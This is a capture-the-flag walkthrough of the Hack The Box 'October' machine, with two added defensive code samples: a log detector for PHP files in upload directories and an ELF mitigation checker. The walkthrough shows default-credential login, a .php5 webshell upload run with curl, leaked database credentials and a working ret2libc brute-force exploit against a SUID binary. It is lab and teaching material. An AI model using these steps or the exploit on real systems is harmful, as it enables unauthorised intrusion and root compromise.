Port scan

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 09:59 CST
Nmap scan report for 10.10.10.16
Host is up (0.067s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds
┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 09:59 CST
Nmap scan report for 10.10.10.16
Host is up (0.066s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_ 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: October CMS - Vanilla
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:google:android:4.0 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.65 seconds

Web

This is an October CMS instance. A quick look at its historical vulnerabilities shows that most of them require an administrator account with permission to modify files, and registering an ordinary account didn't unlock any additional functionality, so I scanned for directories.

┌──(mikannse㉿kali)-[~/HTB/october]
└─$ gobuster dir -u http://10.10.10.16 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.16
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blog (Status: 200) [Size: 4255]
/forum (Status: 200) [Size: 9588]
/themes (Status: 301) [Size: 310] [--> http://10.10.10.16/themes/]
/modules (Status: 301) [Size: 311] [--> http://10.10.10.16/modules/]
/account (Status: 200) [Size: 5089]
/tests (Status: 301) [Size: 309] [--> http://10.10.10.16/tests/]
/storage (Status: 301) [Size: 311] [--> http://10.10.10.16/storage/]
/plugins (Status: 301) [Size: 311] [--> http://10.10.10.16/plugins/]
/backend (Status: 302) [Size: 400] [--> http://10.10.10.16/backend/backend/auth]
/Blog (Status: 200) [Size: 4253]
/vendor (Status: 301) [Size: 310] [--> http://10.10.10.16/vendor/]
/config (Status: 301) [Size: 310] [--> http://10.10.10.16/config/]
/Forum (Status: 200) [Size: 9590]
/error (Status: 200) [Size: 3350]
/Account (Status: 200) [Size: 5089]

There is a backend at /backend, and admin:admin logged straight in, so now the historical vulnerabilities above become usable.

PHP files can be uploaded through the media manager, but the extension has to be .php5; I wrote a one-line webshell into one.

┌──(mikannse㉿kali)-[~/HTB/october]
└─$ curl "http://10.10.10.16/storage/app/media/shell.php5?cmd=whoami"
www-data
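From the defender's side, the two facts above (a default admin password and a media directory that serves a .php5 file as PHP) leave a clear trail in the web server log: a request for a PHP-named file under a user-writable path, with a command in the query string. The following is an added example, not code from the writeup or from October CMS: it parses Apache combined-log lines, flags requests for PHP handler aliases anywhere in the file name under an upload directory, and pairs that with the allow-list check an upload handler should apply. The log lines are constructed; the /storage/app/media/ path is the one seen on the page, the /storage/app/uploads/ prefix and the alias list are assumptions about a typical Apache/mod_php setup.

```python
import re
from urllib.parse import urlsplit

# Constructed Apache combined-log lines (not captured from the box). The
# /storage/app/media/ prefix is October CMS's public media directory as seen
# on the page; client IPs, timestamps, sizes and user agents are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Sep/2024:10:12:01 +0000] "GET /storage/app/media/shell.php5?cmd=whoami HTTP/1.1" 200 9 "-" "curl/8.8.0"
10.10.14.5 - - [08/Sep/2024:10:12:08 +0000] "GET /storage/app/media/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.9 - - [08/Sep/2024:10:13:44 +0000] "GET /storage/app/media/report.PhTml HTTP/1.1" 200 12 "-" "python-requests/2.32"
10.10.14.9 - - [08/Sep/2024:10:14:02 +0000] "GET /backend/backend/auth HTTP/1.1" 200 400 "-" "Mozilla/5.0"
10.10.14.9 - - [08/Sep/2024:10:14:30 +0000] "GET /storage/app/media/notes.php.txt HTTP/1.1" 404 300 "-" "Mozilla/5.0"
"""

# Extensions a typical Apache/mod_php configuration maps to the PHP handler
# (assumed list). Apache compares extensions case-insensitively, and an
# AddHandler-style mapping matches any dotted component, not only the last.
PHP_ALIASES = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Web-visible directories users can write into: the first is the page's media
# path, the second is a placeholder for any other upload directory.
USER_WRITABLE_PREFIXES = ("/storage/app/media/", "/storage/app/uploads/")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def php_components(filename):
    """Dotted components of `filename` (after the first dot) that are PHP
    handler aliases, lower-cased. An empty list means the name is clean."""
    parts = filename.lower().split(".")[1:]
    return [p for p in parts if p in PHP_ALIASES]


def flag_php_in_upload_dirs(log_text):
    """Scan combined-log text and report requests for files under a
    user-writable directory whose name carries a PHP alias anywhere."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.startswith(USER_WRITABLE_PREFIXES):
            continue
        basename = url.path.rsplit("/", 1)[-1]
        aliases = php_components(basename)
        if not aliases:
            continue
        status = int(m["status"])
        findings.append({
            "ip": m["ip"],
            "path": url.path,
            "query": url.query,
            "status": status,
            "aliases": aliases,
            # a 2xx on a PHP-named file in an upload dir means the server
            # executed (or at least served) it; a 404 means it was gone
            "served": 200 <= status < 300,
            "double_extension": len(basename.split(".")) > 2,
        })
    return findings


def is_safe_upload_name(filename, allowed_extensions=("png", "jpg", "jpeg", "gif", "pdf")):
    """Allow-list check for an upload handler: the last extension must be in
    the allow-list and no dotted component may be a PHP alias. This is the
    hardened counterpart to rejecting only names that end in '.php'."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False
    if parts[-1] not in allowed_extensions:
        return False
    return not php_components(filename)


if __name__ == "__main__":
    for finding in flag_php_in_upload_dirs(SAMPLE_LOG):
        print(finding)
```

The allow-list matters more than the detector: a media manager that blocks ".php" but accepts ".php5" is a deny-list with a hole, and the server-side handler mapping decides what executes, not the upload form. Feeding the real access log into flag_php_in_upload_dirs() turns the page's curl request into a finding with the source IP and the command in the query string.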

Privilege escalation

Database credentials are in config's databases.php, and a MySQL instance is indeed listening locally.

'mysql' => [
    'driver'    => 'mysql',
    'host'      => 'localhost',
    'port'      => '',
    'database'  => 'october',
    'username'  => 'october',
    'password'  => 'OctoberCMSPassword!!',
    'charset'   => 'utf8',
    'collation' => 'utf8_unicode_ci',
    'prefix'    => '',
],

Looking at the backend table gave harry's hash, but it couldn't be cracked.

|  1 | Harry      | Varthakouris | harry | harry@october.htb | $2y$10$4tBYxIpkBpR9.coxVUdeJetCp77EFLp1U2o/f2.wlKaBbe698aIzO | NULL            | NULL

But there is a usable SUID binary, ovrflw, which looks like a buffer overflow; the box is 32-bit.

www-data@october:/tmp/october-1.0.412$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
<SNIP>
-rwsr-xr-x 1 root root 7377 Apr 21 2017 /usr/local/bin/ovrflw

It seems to need the libc contents, so I ended up copying a writeup (sigh). Run this script with python2:

import struct, subprocess

libcBase = 0xb75eb000        # one guessed libc base; ASLR is why the loop retries
systemOffset = 0x00040310    # offset of system() in this libc
binShOffset = 0x00162bac     # offset of the "/bin/sh" string in this libc
libcAddress = struct.pack("<I", libcBase+systemOffset)
exitAddress = struct.pack("<I", 0xd34db33f)   # dummy return address after system()
binShAddress = struct.pack("<I", libcBase+binShOffset)
payload = "\x90"*112
payload += libcAddress
payload += exitAddress
payload += binShAddress
i = 0
while True:
    i += 1
    if i%10 == 0:
        print "Attempts: " + str(i)
    subprocess.call(["/usr/local/bin/ovrflw", payload])
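The reason a script like this can simply guess one libc base and rerun the binary until it is right is that a 32-bit x86 process gets only 8 bits of mmap randomization by default (256 candidate bases), so the guess is correct on average every few hundred runs. Whether the binary was built with the compile-time mitigations that would have mattered here (NX, PIE, a stack canary, RELRO) is the first thing a defender should check before anything reaches a writeup. The following is an added example, not code from the writeup or from the box: a minimal ELF inspector that reads the header and program headers and reports those indicators. It constructs its own sample ELF32 images (labelled as constructed, nothing loadable) so it runs offline; pass a file path to inspect a real binary. The canary check is a heuristic (presence of the `__stack_chk_fail` symbol name in the image), and RELRO is reported as "segment present", not as full RELRO.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header describing stack permissions
PT_GNU_RELRO = 0x6474E552   # region made read-only after relocation
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3


def inspect_elf(data):
    """Report compile-time mitigation indicators for an ELF image (bytes):
    PIE (ET_DYN), NX (GNU_STACK without PF_X), a RELRO segment, and a
    heuristic canary check (the __stack_chk_fail symbol name in the image)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    end = "<" if data[5] == 1 else ">"      # EI_DATA: 1 = little-endian
    e_type, = struct.unpack_from(end + "H", data, 16)
    if is64:
        e_phoff, = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        e_phoff, = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)

    stack_flags = None
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, p_flags = struct.unpack_from(end + "II", data, off)
        else:
            p_type, = struct.unpack_from(end + "I", data, off)
            p_flags, = struct.unpack_from(end + "I", data, off + 24)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = True

    return {
        "bits": 64 if is64 else 32,
        "pie": e_type == ET_DYN,
        # None: no GNU_STACK header, so the kernel applies its platform default
        "nx": None if stack_flags is None else not (stack_flags & PF_X),
        "relro": relro,   # segment present; full RELRO also needs DT_BIND_NOW (not checked)
        "canary": b"__stack_chk_fail" in data,
    }


def build_sample_elf32(exec_stack, pie, canary):
    """Construct a minimal little-endian ELF32 image (header plus two program
    headers, nothing loadable) so the checker can run offline. Constructed
    test data only; it is not a binary that could execute."""
    phdrs = [(PT_GNU_STACK, 0x6 | (PF_X if exec_stack else 0)), (PT_GNU_RELRO, 0x4)]
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # class=32, LE, version 1
    header = ident + struct.pack(
        "<HHIIIIIHHHHHH",
        ET_DYN if pie else ET_EXEC, 3, 1, 0,   # e_type, e_machine (EM_386), e_version, e_entry
        52, 0, 0,                              # e_phoff (right after header), e_shoff, e_flags
        52, 32, len(phdrs), 40, 0, 0,          # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    )
    body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 4) for t, f in phdrs)
    if canary:
        body += b"\x00__stack_chk_fail\x00"
    return header + body


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(inspect_elf(fh.read()))
    else:
        print(inspect_elf(build_sample_elf32(exec_stack=False, pie=False, canary=False)))
```

On a real system this is what `checksec` or `readelf -lW` tells you; the point of writing it out is to see that every indicator comes straight from the program headers the loader itself reads, so a build pipeline can gate on them before a setuid binary is ever installed.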

Rambling

I'll start learning binary exploitation next month.